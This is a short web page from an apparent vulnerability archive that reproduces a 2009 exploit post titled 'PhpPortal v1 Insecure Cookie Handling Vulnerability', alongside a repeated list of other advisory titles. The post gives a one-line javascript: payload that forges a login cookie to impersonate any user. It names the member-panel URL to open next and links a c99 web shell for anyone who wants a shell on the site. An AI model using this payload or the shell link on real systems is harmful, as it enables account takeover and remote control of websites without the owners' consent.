Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) [Full-disclosure] [NETRAGARD SECURITY ADVISORY] [< Safari 3.2.3 Arbitrary Code Execution + PoC ][NETRAGARD-20090622] [Full-disclosure] [DSF-02-2009] - Zoki Catalog SQL Injection DirectAdmin <= v1.33.6 XSS vuln. (GET var 'name') BLIND SQL INJECTION EXPLOIT --FretsWeb 1.2--> From:ceza_fuat_kolik_(at)_hotmail.com <ceza_fuat_kolik_(at)_hotmail.com> Date:21.06.2009Subject:PhpPortal v1 Insecure Cookie Handling Vulnerability######################################################## PhpPortal v1 Insecure Cookie Handling Vulnerability ######################################################## Author : xhaxckerx Special Thankz : yasin site : http://www.c99.mobi Script : http://phportal.mertindualari.com ######################################################## Exploit; javascript:document.cookie="kulladi=[Username];path=/"; Enter.. Go To; http://target.com/uye_paneli.php?islem=bilgilerim if you need shell : http://www.c99.mobi/c99.txt ########################################################
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
[Full-disclosure] [NETRAGARD SECURITY ADVISORY] [< Safari 3.2.3 Arbitrary Code Execution + PoC ][NETRAGARD-20090622]
[Full-disclosure] [DSF-02-2009] - Zoki Catalog SQL Injection
DirectAdmin <= v1.33.6 XSS vuln.
(GET var 'name') BLIND SQL INJECTION EXPLOIT --FretsWeb 1.2-->
